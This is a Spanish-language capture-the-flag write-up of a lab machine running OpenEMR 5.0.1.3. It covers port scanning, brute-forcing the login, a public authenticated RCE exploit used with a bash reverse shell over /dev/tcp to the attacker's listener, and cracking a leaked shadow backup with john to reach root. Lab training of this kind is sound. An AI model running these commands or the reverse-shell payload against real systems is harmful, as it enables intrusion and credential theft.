Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.20
❯ nmap -sCV -p80 -oN 02-targeted.txt 192.168.1.20
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-26 15:35 -04
Nmap scan report for 192.168.1.20
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
|_http-server-header: Apache/2.4.38 (Debian)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.08 secondsEl sitio es OpenEMR. Enumerando encontramos, entre otras cosas, un wordlist.txt y la versión (5.0.1.3):
❯ gobuster dir -u 'http://192.168.1.20' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,png,gif,zip -r
...
/wordlist.txt (Status: 200) [Size: 14394]
...
❯ curl http://192.168.1.20/admin.php
...
<td>5.0.1 (3)</td>
...Hacemos fuerza bruta del login con Burp Intruder y ese wordlist.txt, obteniendo admin:.:.yarrak.:.31. La versión es vulnerable a RCE autenticado:
❯ searchsploit openemr 5.0.1.3
...
OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated) | php/webapps/45161.py
...
❯ python3 45161.py http://192.168.1.20 -u admin -p '.:.yarrak.:.31' -c 'bash -i >& /dev/tcp/192.168.1.5/1234 0>&1'
❯ ncat -nlvp 1234
Ncat: Connection from 192.168.1.20:39150.
bash: cannot set terminal process group (497): Inappropriate ioctl for device
bash: no job control in this shell
www-data@driftingblues:/var/www/html/interface/main$Para escalar, encontramos un backup de /etc/shadow en /var/backups:
www-data@driftingblues:/var/backups$ cat shadow.backup
...
root:$6$sqBC8Bk02qmul3ER$...:18742:0:99999:7:::
clapton:$6$/eeR7/4JGbeM7nwc$...:18742:0:99999:7:::
...Crackeamos con john (rockyou) y cae el de clapton:
❯ /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt credentials.txt
...
dragonsblood (clapton)
...Obtenemos shell como clapton y la primera flag. En su home hay un binario SUID con un buffer overflow, pero resulta ser un rabbit hole:
void main(int argc,char **argv)
{
char local_74 [100];
int *local_10;
local_10 = &argc;
strcpy(local_74,argv[1]);
puts("hahaha silly hacker!");
return;
}El camino real es un wordlist.txt en el home de clapton, que usamos para crackear el hash de root:
❯ /opt/john/run/john -w=./wordlist.txt credentials.txt
...
.:.yarak.:. (root)
...Obtenemos las credenciales de root y la última flag.
Fin.